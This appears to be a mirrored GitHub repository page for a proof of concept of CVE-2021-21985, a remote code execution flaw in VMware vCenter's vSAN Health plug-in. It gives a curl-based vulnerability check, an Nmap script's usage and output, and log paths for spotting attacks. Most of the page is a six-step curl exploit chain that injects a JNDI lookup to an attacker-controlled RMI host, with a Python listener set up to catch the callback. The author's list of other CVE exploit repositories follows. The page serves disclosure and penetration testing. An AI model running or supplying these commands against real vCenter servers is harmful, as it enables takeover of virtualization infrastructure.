alt3kx/CVE-2021-21985_PoC alt3kx/CVE-2021-21985_PoC

  • Stars
    star
    210
  • Rank 183,589 (Top 4 %)
  • Language
    Lua
  • License
    GNU General Publi...
  • Created about 3 years ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
alt3kx/CVE-2021-21985_PoC
github

alt3kx

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2021-21985 (Vulnerable Code)

06_test_class_method

CLASS/METHOD(s) available, a little sample for PoC purposes: com.vmware.vsan.client.services.capability.VsanCapabilityProvider

[../snip]
getClusterCapabilityData
getHostCapabilityData
getHostsCapabilitiyData
getIsDeduplicationSupported
getIsEncryptionSupported
getIsLocalDataProtectionSupportedOnVc
getIsLocalDataProtectionSupportedOnCluster
getIsRemoteDataProtectionSupported
getIsObjectIdentitiesSupportedOnCluster
getIsHistoricalCapacitySupported
getIsPerfVerboseModeSupported
getIsPerfNetworkDiagnosticModeSupported
getIsPerfDiagnosticsFeedbackSupportedOnVc
getIsAdvancedClusterSettingsSupported
getIsRecreateDiskGroupSupported
getIsPurgeInaccessibleVmSwapObjectsSupported
getIsUpdateVumReleaseCatalogOfflineSupported
getIsVitOnlineResizeSupported
getIsImprovedCapacityMonitoringSupportedOnVc
getIsVmLevelCapacityMonitoringSupported
getIsWhatIfCapacitySupported
getIsHostReservedCapacitySupported
getIsUnmountWithMaintenanceModeSupported
getIsEvacuationStatusSupportedOnCluster
...
...
[../snip]

CVE-2021-21985 (PoC)

The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server.

This manual inspec looks the existence of CVE-2021-21985 based on CLASS/METHOD(s) available by default on vCenter e.g. "/ui/h5-vsan/rest/*" sending a POST request and looking in response body (200) JSON data.

Manual inspection:

# curl -s -k -X $'POST' -H $'Host: <target>' -H $'User-Agent: alex666' -H $'Content-Type: application/json' -H $'Connection: close' --data-binary $'{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\x0d\x0a' $'https://<target>/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData'

03_curl

PoC Exploit Released (1)

Credits: https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/

Steps to reproduce:

Start your python server to receive the connection from targeted system (vCenter) e.g 

# python3 -m http.server 9090

Step 1: set TargetObject to null

POST /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetObject HTTP/1.1
{“methodInput”:[null]}

# curl -i -s -k -X $'POST' -H $'Host: <target>' -H $'User-Agent: alex666' -H $'Content-Type: application/json' -H $'Connection: close' --data-binary $'{\xe2\x80\x9cmethodInput\xe2\x80\x9d:[null]}' $'https://<target>/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetObject'

Step 2: setStaticMethod to payload

POST /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod HTTP/1.1
{“methodInput”:[“javax.naming.InitialContext.doLookup”]} 

# curl -i -s -k -X $'POST' -H $'Host: <target>' -H $'User-Agent: alex666' -H $'Content-Type: application/json' -H $'Connection: close' --data-binary $'{\"methodInput\":[\"javax.naming.InitialContext.doLookup\"]}\x0d\x0a' $'https://<target>/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod'

Step 3: setTargetMethod to doLookup

POST /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod HTTP/1.1
{“methodInput”:[“doLookup”]} 

# curl -i -s -k -X $'POST' -H $'Host: <target>' -H $'User-Agent: alex666' -H $'Content-Type: application/json' -H $'Connection: close' --data-binary $'\x0d\x0a{\"methodInput\":[\"doLookup\"]}\x0d\x0a' $'https://<target>/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod'

Step 4: setArguments with payload args

POST /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments HTTP/1.1
{“methodInput”:[["rmi://attacker:9090/alex666"]]} 

# curl -i -s -k -X $'POST' -H $'Host: <target>' -H $'User-Agent: alex666' -H $'Content-Type: application/json' -H $'Connection: close' --data-binary $'{\"methodInput\":[[\"rmi://<attacker>:9090/alex666\"]]}' $'https://<target>/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments'

Step 5: initial payload class and methods

POST /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare HTTP/1.1
{“methodInput”:[]} 

# curl -i -s -k -X $'POST' -H $'Host: <target>' -H $'User-Agent: alex666' -H $'Content-Type: application/json' -H $'Connection: close' --data-binary $'{\"methodInput\":[]}' $'https://<target>/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare'

Step 6: trigger method invoke, after thiis POST await some seconds and see your pytthon server log

POST /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke HTTP/1.1
{“methodInput”:[]} 

# curl -i -s -k -X $'POST' -H $'Host: <target>' -H $'User-Agent: alex666' -H $'Content-Type: application/json' -H $'Connection: close' --data-binary $'{\"methodInput\":[]}\x0d\x0a' $'https://<target>/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke'

exploit_01

References:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21985
https://www.vmware.com/security/advisories/VMSA-2021-0010.html
https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis

CVE-2021-21985 (NSE checker)

This script looks the existence of CVE-2021-21985 based on CLASS/METHOD(s) available by default on vCenter e.g. "/ui/h5-vsan/rest/*" sending a POST request and looking in response body (200) JSON data.

Usage

# nmap -p443 --script CVE-2021-21985.nse <target>

Output

---
-- @usage
-- nmap -p443 --script CVE-2021-21985.nse <target>
-- @output
-- PORT    STATE SERVICE
-- 443/tcp open  https
-- | CVE-2021-21985: 
-- |   VULNERABLE:
-- |   vCenter 6.5-7.0 RCE
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2021-21985
-- |       The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input 
-- |       validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server.
-- |     Disclosure date: 2021-05-28
-- |     References:
-- |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21985

CVE-2021-21985

vCenter vSAN Health (console logs)

PATH logs vCenter

# /var/log/vmware/vsan-health/

03_vSAN-health

vSphere Client (console logs)

Monitoring the attacks

# tail -f /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log

04_monitoring

Author

Alex Hernandez aka (@_alt3kx_)

More Repositories

1

CVE-2023-24055_PoC

CVE-2023-24055 PoC (KeePass 2.5x)
247
star
2

CVE-2022-22965

Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)
Lua
102
star
3

wafaray

Enhance your malware detection with WAF + YARA (WAFARAY)
Shell
97
star
4

CVE-2022-1388_PoC

F5 BIG-IP RCE exploitation (CVE-2022-1388)
87
star
5

CVE-2021-21972

Lua
55
star
6

CVE-2021-26084_PoC

54
star
7

CVE-2021-26855_PoC

Python
53
star
8

wafparan01d3

Quick WAF "paranoid" Doctor Evaluation | WAFPARAN01D3 Tool
Python
23
star
9

CVE-2022-22965_PoC

Spring Framework RCE (Quick pentest notes)
16
star
10

alt3kx.github.io

HTML
11
star
11

CVE-2018-12463

XML external entity (XXE) vulnerability in /ssc/fm-ws/services in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 (0day CVE-2018-12463)
6
star
12

airdecloak-ng

My Aircrack-ng contribution with Thomas d'Otreppe
C
4
star
13

CVE-2019-10685

A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6
3
star
14

papers

A handy collection of my public papers, all in one place.
2
star
15

CVE-2018-7691

The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10
2
star
16

CVE-2018-7690

The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10
2
star
17

CVE-2018-10715

CVE-2018-10715
1
star
18

CVE-2007-6638

March Networks DVR 3204 - Logfile Information Disclosure
1
star
19

CVE-2001-0932

Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities
1
star
20

CVE-2020-13457

CVE-2020-13457
1
star
21

CVE-2004-2549

Nortel Wireless LAN Access Point 2200 Series - Denial of Service
1
star
22

CVE-2009-4118

Cisco VPN Client - Integer Overflow Denial of Service
1
star
23

CVE-2018-10467

CVE-2018-10467
1
star
24

CVE-2002-0448

Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities
1
star
25

CVE-2002-0289

Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow
1
star
26

CVE-2018-12596

Ektron Content Management System (CMS) 9.20 SP2, remote re-enabling users (CVE-2018–12596)
1
star
27

CVE-2001-0933

Cooolsoft PowerFTP Server 2.03 allows remote attackers to list the contents of arbitrary drives via a ls (LIST) command that includes the drive letter as an argument, e.g. "ls C:".
1
star
28

CVE-2001-0934

Cooolsoft PowerFTP Server 2.03 allows remote attackers to obtain the physical path of the server root via the pwd command, which lists the full pathname.
1
star
29

CVE-2007-5036

Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)
1
star
30

CVE-2002-0200

Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.
1
star
31

CVE-2001-1442

ISC INN 2.x - Command-Line Buffer Overflow
C
1
star
32

CVE-2018-12598

CVE-2018-12598
1
star
33

CVE-2018-12597

CVE-2018-12597
1
star
34

CVE-2018-10732

Dataiku REST-API by default the software, allows anonymous access to functionality that allows an attacker to know valid users.
1
star
35

CVE-2002-0201

Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.
Perl
1
star
36

CTF_writeups

CTF writeups
1
star